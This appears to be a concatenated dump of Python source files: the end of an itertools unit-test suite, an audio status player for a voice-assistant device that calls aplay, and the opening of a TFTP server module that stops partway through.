self.assertEqual(list(zip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_zip_longest(self):
self.assertEqual(list(zip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
list(map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split())))
self.assertEqual(list(permutations(range(3))),
[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
list(map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split())))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
def test_stapmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxsize, s.step or 1
it = iter(range(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in zip(range(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in zip(range(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
next(iterator)
del container, iterator
def test_accumulate(self):
a = []
self.makecycle(accumulate([1,2,a,3]), a)
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
n = 10
keyfunc = lambda x: x
for i, j in groupby(range(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_filter(self):
a = []
self.makecycle(filter(lambda x:True, [a]*2), a)
def test_filterfalse(self):
a = []
self.makecycle(filterfalse(lambda x:False, a), a)
def test_zip(self):
a = []
self.makecycle(zip([a]*2, [a]*3), a)
def test_zip_longest(self):
a = []
self.makecycle(zip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(zip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_map(self):
a = []
self.makecycle(map(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_pairwise(self):
a = []
self.makecycle(pairwise([a]*5), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_accumulate(self):
s = [1,2,3,4,5]
r = [1,3,6,10,15]
n = len(s)
for g in (G, I, Ig, L, R):
self.assertEqual(list(accumulate(g(s))), r)
self.assertEqual(list(accumulate(S(s))), [])
self.assertRaises(TypeError, accumulate, X(s))
self.assertRaises(TypeError, accumulate, N(s))
self.assertRaises(ZeroDivisionError, list, accumulate(E(s)))
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, compress, N(s), repeat(1))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, cycle, N(s))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, groupby, N(s))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_filter(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filter(isEven, g(s))),
[x for x in g(s) if isEven(x)])
self.assertRaises(TypeError, filter, isEven, X(s))
self.assertRaises(TypeError, filter, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filter(isEven, E(s)))
def test_filterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filterfalse(isEven, g(s))),
[x for x in g(s) if isOdd(x)])
self.assertRaises(TypeError, filterfalse, isEven, X(s))
self.assertRaises(TypeError, filterfalse, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filterfalse(isEven, E(s)))
def test_zip(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip(g(s))), lzip(g(s)))
self.assertEqual(list(zip(g(s), g(s))), lzip(g(s), g(s)))
self.assertRaises(TypeError, zip, X(s))
self.assertRaises(TypeError, zip, N(s))
self.assertRaises(ZeroDivisionError, list, zip(E(s)))
def test_ziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip_longest(g(s))), list(zip(g(s))))
self.assertEqual(list(zip_longest(g(s), g(s))), list(zip(g(s), g(s))))
self.assertRaises(TypeError, zip_longest, X(s))
self.assertRaises(TypeError, zip_longest, N(s))
self.assertRaises(ZeroDivisionError, list, zip_longest(E(s)))
def test_map(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(map(onearg, g(s))),
[onearg(x) for x in g(s)])
self.assertEqual(list(map(operator.pow, g(s), g(s))),
[x**x for x in g(s)])
self.assertRaises(TypeError, map, onearg, X(s))
self.assertRaises(TypeError, map, onearg, N(s))
self.assertRaises(ZeroDivisionError, list, map(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, islice, N(s), 10)
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_pairwise(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
seq = list(g(s))
expected = list(zip(seq, seq[1:]))
actual = list(pairwise(g(s)))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, pairwise, X(s))
self.assertRaises(TypeError, pairwise, N(s))
self.assertRaises(ZeroDivisionError, list, pairwise(E(s)))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = lzip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))),
[x**x for x in g(s)])
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, starmap, operator.pow, N(ss))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, takewhile, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, dropwhile, isOdd, N(s))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, tee, N(s))
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
class LengthTransparency(unittest.TestCase):
def test_repeat(self):
self.assertEqual(operator.length_hint(repeat(None, 50)), 50)
self.assertEqual(operator.length_hint(repeat(None, 0)), 0)
self.assertEqual(operator.length_hint(repeat(None), 12), 12)
def test_repeat_with_negative_times(self):
self.assertEqual(operator.length_hint(repeat(None, -1)), 0)
self.assertEqual(operator.length_hint(repeat(None, -2)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-1)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-2)), 0)
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(next(z))
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = map(g, items)
z = zip(*[gen]*len(tuple1))
next(z)
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
@support.skip_if_pgo_task
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
it = chain.from_iterable(() for unused in range(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
class K:
def __init__(self, v):
pass
def __eq__(self, other):
nonlocal i
i += 1
if i == 1:
next(g, None)
return True
i = 0
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_keywords_in_subclass(self):
# count is not subclassable...
for cls in (repeat, zip, filter, filterfalse, chain, map,
starmap, islice, takewhile, dropwhile, cycle, compress):
class Subclass(cls):
def __init__(self, newarg=None, *args):
cls.__init__(self, *args)
try:
Subclass(newarg=1)
except TypeError as err:
# we expect type errors because of wrong argument count
self.assertNotIn("keyword arguments", err.args[0])
@support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.ssize_t = struct.calcsize('n')
check_sizeof = support.check_sizeof
def test_product_sizeof(self):
basesize = support.calcobjsize('3Pi')
check = self.check_sizeof
check(product('ab', '12'), basesize + 2 * self.ssize_t)
check(product(*(('abc',) * 10)), basesize + 10 * self.ssize_t)
def test_combinations_sizeof(self):
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(combinations('abcd', 3), basesize + 3 * self.ssize_t)
check(combinations(range(10), 4), basesize + 4 * self.ssize_t)
def test_combinations_with_replacement_sizeof(self):
cwr = combinations_with_replacement
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(cwr('abcd', 3), basesize + 3 * self.ssize_t)
check(cwr(range(10), 4), basesize + 4 * self.ssize_t)
def test_permutations_sizeof(self):
basesize = support.calcobjsize('4Pni')
check = self.check_sizeof
check(permutations('abcd'),
basesize + 4 * self.ssize_t + 4 * self.ssize_t)
check(permutations('abcd', 3),
basesize + 4 * self.ssize_t + 3 * self.ssize_t)
check(permutations('abcde', 3),
basesize + 5 * self.ssize_t + 3 * self.ssize_t)
check(permutations(range(10), 4),
basesize + 10 * self.ssize_t + 4 * self.ssize_t)
libreftest = """ Doctest for examples in the library reference: libitertools.tex
>>> amounts = [120.15, 764.05, 823.14]
>>> for checknum, amount in zip(count(1200), amounts):
... print('Check %d is for $%.2f' % (checknum, amount))
...
Check 1200 is for $120.15
Check 1201 is for $764.05
Check 1202 is for $823.14
>>> import operator
>>> for cube in map(operator.pow, range(1,4), repeat(3)):
... print(cube)
...
1
8
27
>>> reportlines = ['EuroPython', 'Roster', '', 'alex', '', 'laura', '', 'martin', '', 'walter', '', 'samuele']
>>> for name in islice(reportlines, 3, None, 2):
... print(name.title())
...
Alex
Laura
Martin
Walter
Samuele
>>> from operator import itemgetter
>>> d = dict(a=1, b=2, c=1, d=2, e=1, f=2, g=3)
>>> di = sorted(sorted(d.items()), key=itemgetter(1))
>>> for k, g in groupby(di, itemgetter(1)):
... print(k, list(map(itemgetter(0), g)))
...
1 ['a', 'c', 'e']
2 ['b', 'd', 'f']
3 ['g']
# Find runs of consecutive numbers using groupby. The key to the solution
# is differencing with a range so that consecutive numbers all appear in
# same group.
>>> data = [ 1, 4,5,6, 10, 15,16,17,18, 22, 25,26,27,28]
>>> for k, g in groupby(enumerate(data), lambda t:t[0]-t[1]):
... print(list(map(operator.itemgetter(1), g)))
...
[1]
[4, 5, 6]
[10]
[15, 16, 17, 18]
[22]
[25, 26, 27, 28]
>>> def take(n, iterable):
... "Return first n items of the iterable as a list"
... return list(islice(iterable, n))
>>> def prepend(value, iterator):
... "Prepend a single value in front of an iterator"
... # prepend(1, [2, 3, 4]) -> 1 2 3 4
... return chain([value], iterator)
>>> def enumerate(iterable, start=0):
... return zip(count(start), iterable)
>>> def tabulate(function, start=0):
... "Return function(0), function(1), ..."
... return map(function, count(start))
>>> import collections
>>> def consume(iterator, n=None):
... "Advance the iterator n-steps ahead. If n is None, consume entirely."
... # Use functions that consume iterators at C speed.
... if n is None:
... # feed the entire iterator into a zero-length deque
... collections.deque(iterator, maxlen=0)
... else:
... # advance to the empty slice starting at position n
... next(islice(iterator, n, n), None)
>>> def nth(iterable, n, default=None):
... "Returns the nth item or a default value"
... return next(islice(iterable, n, None), default)
>>> def all_equal(iterable):
... "Returns True if all the elements are equal to each other"
... g = groupby(iterable)
... return next(g, True) and not next(g, False)
>>> def quantify(iterable, pred=bool):
... "Count how many times the predicate is true"
... return sum(map(pred, iterable))
>>> def pad_none(iterable):
... "Returns the sequence elements and then returns None indefinitely"
... return chain(iterable, repeat(None))
>>> def ncycles(iterable, n):
... "Returns the sequence elements n times"
... return chain(*repeat(iterable, n))
>>> def dotproduct(vec1, vec2):
... return sum(map(operator.mul, vec1, vec2))
>>> def flatten(listOfLists):
... return list(chain.from_iterable(listOfLists))
>>> def repeatfunc(func, times=None, *args):
... "Repeat calls to func with specified arguments."
... " Example: repeatfunc(random.random)"
... if times is None:
... return starmap(func, repeat(args))
... else:
... return starmap(func, repeat(args, times))
>>> def grouper(n, iterable, fillvalue=None):
... "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
... args = [iter(iterable)] * n
... return zip_longest(*args, fillvalue=fillvalue)
>>> def roundrobin(*iterables):
... "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
... # Recipe credited to George Sakkis
... pending = len(iterables)
... nexts = cycle(iter(it).__next__ for it in iterables)
... while pending:
... try:
... for next in nexts:
... yield next()
... except StopIteration:
... pending -= 1
... nexts = cycle(islice(nexts, pending))
>>> def powerset(iterable):
... "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
... s = list(iterable)
... return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
>>> def unique_everseen(iterable, key=None):
... "List unique elements, preserving order. Remember all elements ever seen."
... # unique_everseen('AAAABBBCCDAABBB') --> A B C D
... # unique_everseen('ABBCcAD', str.lower) --> A B C D
... seen = set()
... seen_add = seen.add
... if key is None:
... for element in iterable:
... if element not in seen:
... seen_add(element)
... yield element
... else:
... for element in iterable:
... k = key(element)
... if k not in seen:
... seen_add(k)
... yield element
>>> def unique_justseen(iterable, key=None):
... "List unique elements, preserving order. Remember only the element just seen."
... # unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
... # unique_justseen('ABBCcAD', str.lower) --> A B C A D
... return map(next, map(itemgetter(1), groupby(iterable, key)))
>>> def first_true(iterable, default=False, pred=None):
... '''Returns the first true value in the iterable.
...
... If no true value is found, returns *default*
...
... If *pred* is not None, returns the first item
... for which pred(item) is true.
...
... '''
... # first_true([a,b,c], x) --> a or b or c or x
... # first_true([a,b], x, f) --> a if f(a) else b if f(b) else x
... return next(filter(pred, iterable), default)
>>> def nth_combination(iterable, r, index):
... 'Equivalent to list(combinations(iterable, r))[index]'
... pool = tuple(iterable)
... n = len(pool)
... if r < 0 or r > n:
... raise ValueError
... c = 1
... k = min(r, n-r)
... for i in range(1, k+1):
... c = c * (n - k + i) // i
... if index < 0:
... index += c
... if index < 0 or index >= c:
... raise IndexError
... result = []
... while r:
... c, n, r = c*r//n, n-1, r-1
... while index >= c:
... index -= c
... c, n = c*(n-r)//n, n-1
... result.append(pool[-1-n])
... return tuple(result)
This is not part of the examples but it tests to make sure the definitions
perform as purported.
>>> take(10, count())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> list(prepend(1, [2, 3, 4]))
[1, 2, 3, 4]
>>> list(enumerate('abc'))
[(0, 'a'), (1, 'b'), (2, 'c')]
>>> list(islice(tabulate(lambda x: 2*x), 4))
[0, 2, 4, 6]
>>> it = iter(range(10))
>>> consume(it, 3)
>>> next(it)
3
>>> consume(it)
>>> next(it, 'Done')
'Done'
>>> nth('abcde', 3)
'd'
>>> nth('abcde', 9) is None
True
>>> [all_equal(s) for s in ('', 'A', 'AAAA', 'AAAB', 'AAABA')]
[True, True, True, False, False]
>>> quantify(range(99), lambda x: x%2==0)
50
>>> a = [[1, 2, 3], [4, 5, 6]]
>>> flatten(a)
[1, 2, 3, 4, 5, 6]
>>> list(repeatfunc(pow, 5, 2, 3))
[8, 8, 8, 8, 8]
>>> import random
>>> take(5, map(int, repeatfunc(random.random)))
[0, 0, 0, 0, 0]
>>> list(islice(pad_none('abc'), 0, 6))
['a', 'b', 'c', None, None, None]
>>> list(ncycles('abc', 3))
['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']
>>> dotproduct([1,2,3], [4,5,6])
32
>>> list(grouper(3, 'abcdefg', 'x'))
[('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]
>>> list(roundrobin('abc', 'd', 'ef'))
['a', 'd', 'e', 'b', 'f', 'c']
>>> list(powerset([1,2,3]))
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
>>> all(len(list(powerset(range(n)))) == 2**n for n in range(18))
True
>>> list(powerset('abcde')) == sorted(sorted(set(powerset('abcde'))), key=len)
True
>>> list(unique_everseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D']
>>> list(unique_everseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'D']
>>> list(unique_justseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D', 'A', 'B']
>>> list(unique_justseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'A', 'D']
>>> first_true('ABC0DEF1', '9', str.isdigit)
'0'
>>> population = 'ABCDEFGH'
>>> for r in range(len(population) + 1):
... seq = list(combinations(population, r))
... for i in range(len(seq)):
... assert nth_combination(population, r, i) == seq[i]
... for i in range(-len(seq), 0):
... assert nth_combination(population, r, i) == seq[i]
"""
__test__ = {'libreftest' : libreftest}
def test_main(verbose=None):
test_classes = (TestBasicOps, TestVariousIteratorArgs, TestGC,
RegressionTests, LengthTransparency,
SubclassWithKwargsTest, TestExamples,
TestPurePythonRoughEquivalents,
SizeofTest)
support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in range(len(counts)):
support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print(counts)
support.run_doctest(sys.modules[__name__], verbose)
if __name__ == "__main__":
test_main(verbose=True)
|
statusAudioPlayer.py
|
# Copyright (C) 2017 Next Thing Co. <software@nextthing.co>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
import subprocess
import threading
import psutil
import time
ASSISTANT_LISTENING_AUDIO = "resources/chime.wav"
ASSISTANT_FAILURE_AUDIO = "resources/unsuccessful.wav"
INTRO_AUDIO = "resources/instructions.wav"
WAIT_AUDIO = "resources/wait.wav"
THINKING_AUDIO = "resources/thinking.wav"
READY_AUDIO = "resources/ready.wav"
INTERNET_DISCONNECTED = "resources/internet_disconnected.wav"
SETUP_AUDIO_PART1 = "resources/setup-1.wav" # Intructions before saying IP address
SETUP_AUDIO_PART2_1 = "resources/setup-2_1.wav" # For 192.168.81.1
SETUP_AUDIO_PART2_2 = "resources/setup-2_2.wav" # For 192.168.81.2
SETUP_AUDIO_PART3 = "resources/setup-3.wav" # Instructions after saying IP address
SETUP_AUDIO_PART4 = "resources/setup-4.wav" # Repeated instruction
class StatusAudioPlayer():
def __init__(self):
self.bPlayedIntro = False
self.bPlayedSetupInstructions = False
self.audioHighPriorityProcs = 0
self.bUserConnectedToWebFrontend = False
self.introTime = -100
self.audioTime = -100
# Set a status value for whether or not the user has successfully connected to the local web server's HTML frontend.
def setUserConnectionStatus(self,bStatus):
self.bUserConnectedToWebFrontend = bStatus
# Use aplay to play a WAV audio file with a specified priority and any delay.
# Can also set to block. Otherwise, aplay will run in its own thread.
def playAudio(self,audioFile,bBlocking=False,bPriority=False,delay=0):
# If this audio file is not high priority and one is already playing, do nothing.
if not bPriority and self.highPriorityAudioIsPlaying(): return
if delay > 0 and time.time() - self.audioTime < 0.5: return
def aplay():
self.audioTime = time.time()
if bPriority: self.audioHighPriorityProcs = self.audioHighPriorityProcs + 1
cmd = "sleep " + str(delay) + " && aplay --period-size=8192 --buffer-size=32768 --quiet " + audioFile
subprocess.call(cmd,shell=True)
if bPriority: self.audioHighPriorityProcs = self.audioHighPriorityProcs - 1
if not bBlocking:
t = threading.Thread(target=aplay, args = ())
t.setDaemon(True)
t.start()
else:
aplay()
return
def killAll(self):
for proc in psutil.process_iter():
if proc.name() == 'aplay':
proc.kill()
def highPriorityAudioIsPlaying(self):
if self.audioHighPriorityProcs > 0:
return True
else:
return False
def playIntro(self):
if not self.bPlayedIntro:
self.introTime = time.time()
self.bPlayedIntro = True
self.playAudio(INTRO_AUDIO,delay=1,bPriority=True)
time.sleep(1.5)
else:
self.playAudio(WAIT_AUDIO,delay=1.5,bPriority=False)
def playSetupInstructions(self):
if self.bPlayedSetupInstructions:
return
self.bPlayedSetupInstructions = True
# The USB ethernet gadget will either use 192.168.81.1 or 192.168.82.1, depending on the client's OS.
# Return true if 81.1, or false if 82.1
def getIPAudio():
status = None
while not status:
try:
status = subprocess.check_output(['ip','a','show','usb0'])
except:
pass
if status.find('NO-CARRIER') > -1:
return SETUP_AUDIO_PART2_2
return SETUP_AUDIO_PART2_1
def audioSequence():
time.sleep(0.5)
self.playAudio(SETUP_AUDIO_PART1, bBlocking=True,bPriority=True)
# Play specific files for a USB IP address for 192.168.81.1 and another for 192.168.82.1
self.playAudio(getIPAudio(), bBlocking=True,bPriority=True)
reminders = 0
# If user has not yet connected to the web server HTML frontend, play the IP address audio again.
while not self.bUserConnectedToWebFrontend:
if reminders == 0:
time.sleep(1)
self.audioMessagePriorityProc = self.playAudio(SETUP_AUDIO_PART3,bBlocking=True,bPriority=True)
else:
time.sleep(10)
self.audioMessagePriorityProc = self.playAudio(SETUP_AUDIO_PART4,bBlocking=True,bPriority=True)
self.audioMessagePriorityProc = self.playAudio(getIPAudio(), bBlocking=True,bPriority=True)
reminders = reminders+1
if reminders > 5:
return
t = threading.Thread(target=audioSequence, args = ())
t.setDaemon(True)
t.start()
def playThinking(self,delay=0):
self.playAudio(THINKING_AUDIO,delay=delay)
def playDisconnected(self):
time.sleep(0.25)
self.playAudio(INTERNET_DISCONNECTED)
self.playAudio(THINKING_AUDIO,delay=2)
def playWait(self):
time.sleep(0.25)
self.playAudio(WAIT_AUDIO)
def playReadyAudio(self):
time.sleep(0.25)
if self.introTime and time.time() - self.introTime < 30:
return
self.playAudio(READY_AUDIO)
def playListeningAudio(self):
self.playAudio(ASSISTANT_LISTENING_AUDIO)
def playFailureAudio(self):
self.playAudio(ASSISTANT_FAILURE_AUDIO)
|
tftp.py
|
import errno
import logging
import socket
from pathlib import Path, PurePosixPath
from threading import Thread
from typing import List, NewType, Tuple, Union, Dict
logger = logging.getLogger('tftpd')
BLOCK_SIZE = 512
BUF_SIZE = 65536
TIMEOUT = 0.5
MAX_RETRIES = 10
class TFTPOpcodes:
"""Class containing all the opcodes used in TFTP."""
RRQ = b'\x00\x01'
WRQ = b'\x00\x02'
DATA = b'\x00\x03'
ACK = b'\x00\x04'
ERROR = b'\x00\x05'
OACK = b'\x00\x06'
class TFTPErrorCodes:
"""Class containing all the error codes and their messages used in TFTP."""
